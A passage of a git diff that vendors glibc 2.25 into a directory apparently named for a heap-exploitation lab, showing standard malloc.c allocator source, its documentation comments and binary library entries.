+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
+{
+  /* Avoid using this arena in future.  We do not attempt to synchronize this
+     with anything else because we minimally want to ensure that __libc_message
+     gets its resources safely without stumbling on the current corruption.  */
+  if (ar_ptr)
+    set_arena_corrupt (ar_ptr);
+
+  if ((action & 5) == 5)
+    __libc_message (action & 2, "%s\n", str);
+  else if (action & 1)
+    {
+      char buf[2 * sizeof (uintptr_t) + 1];
+
+      buf[sizeof (buf) - 1] = '\0';
+      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
+      while (cp > buf)
+        *--cp = '0';
+
+      __libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
+                      __libc_argv[0] ? : "<unknown>", str, cp);
+    }
+  else if (action & 2)
+    abort ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      mutex_lock (&ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r->size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r->size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r->size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      mutex_unlock (&ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   heap->size, heap->mprotect_size);
+	  total_aspace += heap->size;
+	  total_aspace_mprotect += heap->mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __cfree) weak_alias (__libc_free, cfree)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+weak_alias (__malloc_get_state, malloc_get_state)
+weak_alias (__malloc_set_state, malloc_set_state)
+
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.25/ld-2.25.so b/HeapLAB/.glibc/glibc_2.25/ld-2.25.so
new file mode 100755
index 0000000..867a795
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.25/ld-2.25.so differ
diff --git a/HeapLAB/.glibc/glibc_2.25/ld.so.2 b/HeapLAB/.glibc/glibc_2.25/ld.so.2
new file mode 120000
index 0000000..84b9e91
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.25/ld.so.2
@@ -0,0 +1 @@
+ld-2.25.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.25/libc-2.25.so b/HeapLAB/.glibc/glibc_2.25/libc-2.25.so
new file mode 100755
index 0000000..f750818
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.25/libc-2.25.so differ
diff --git a/HeapLAB/.glibc/glibc_2.25/libc.so.6 b/HeapLAB/.glibc/glibc_2.25/libc.so.6
new file mode 120000
index 0000000..676bb4d
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.25/libc.so.6
@@ -0,0 +1 @@
+libc-2.25.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.25/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.25/malloc/malloc.c
new file mode 100644
index 0000000..4885793
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.25/malloc/malloc.c
@@ -0,0 +1,5318 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2017 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    cfree(void* p);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-internal.h>
+
+#include <malloc/malloc-internal.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifdef NDEBUG
+# define assert(expr) ((void) 0)
+#else
+# define assert(expr) \
+  ((expr)								      \
+   ? ((void) 0)								      \
+   : __malloc_assert (#expr, __FILE__, __LINE__, __func__))
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always
+  be reallocated using malloc-copy-free sequences unless
+  the system supports MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
